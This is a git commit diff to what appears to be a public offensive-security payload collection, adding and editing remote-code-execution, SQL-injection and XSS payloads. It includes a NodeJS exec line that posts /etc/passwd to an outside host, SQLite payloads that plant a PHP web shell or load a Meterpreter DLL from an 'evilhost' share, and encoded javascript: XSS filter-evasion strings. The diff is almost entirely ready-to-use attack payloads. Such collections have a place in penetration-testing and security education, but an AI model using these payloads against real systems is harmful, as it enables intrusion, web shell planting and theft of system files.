Updated XSS,SQL,RCE

This commit is contained in:
swisskyrepo 2016-11-17 10:50:34 +07:00
parent 9f66d48f2b
commit 2fa9683b8c
3 changed files with 31 additions and 2 deletions

View File

@ -3,7 +3,7 @@ Remote code execution is a security vulnerability that allows an attacker to exe
## Exploits
Normal code execution
Normal code execution, execute the command and voila :p
```
cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
@ -37,7 +37,7 @@ daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
NodeJS Code execution
```
require('child_process').exec('wget+--post-data+"x=$(cat+/etc/passwd)"+HOST')
require('child_process').exec('wget --post-data+"x=$(cat /etc/passwd)"+HOST')
```
## Thanks to

View File

@ -101,6 +101,21 @@ PostgreSQL Error Based - Basic
,cAsT(chr(126)||(sEleCt+data_column+fRoM+data_table+lImIt+1+offset+data_offset)||chr(126)+as+nUmeRiC)
```
# SQLite
Remote Command Execution using SQLite command - Attach Database
```
ATTACH DATABASE /var/www/lol.php AS lol;
CREATE TABLE lol.pwn (dataz text);
INSERT INTO lol.pwn (dataz) VALUES (<?system($_GET[cmd]); ?>);--
```
Remote Command Execution using SQLite command - Load_extension
```
UNION SELECT 1,load_extension('\\evilhost\evilshare\meterpreter.dll','DllMain');--
```
Note: By default this component is disabled
# Other usefull payloads
Polyglot injection (multicontext)

View File

@ -99,6 +99,20 @@ javascript:prompt(1)
%26%23106%26%2397%26%23118%26%2397%26%23115%26%2399%26%23114%26%23105%26%23112%26%23116%26%2358%26%2399%26%23111%26%23110%26%23102%26%23105%26%23114%26%23109%26%2340%26%2349%26%2341
&#106&#97&#118&#97&#115&#99&#114&#105&#112&#116&#58&#99&#111&#110&#102&#105&#114&#109&#40&#49&#41
We can encode the "javacript:" in Hex/Octal
\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74\x3aalert(1)
\u006A\u0061\u0076\u0061\u0073\u0063\u0072\u0069\u0070\u0074\u003aalert(1)
\152\141\166\141\163\143\162\151\160\164\072alert(1)
We can use a 'newline character'
java%0ascript:alert(1) - LF (\n)
java%09script:alert(1) - Horizontal tab (\t)
java%0dscript:alert(1) - CR (\r)
Using the escape character
\j\av\a\s\cr\i\pt\:\a\l\ert\(1\)
```
XSS with data: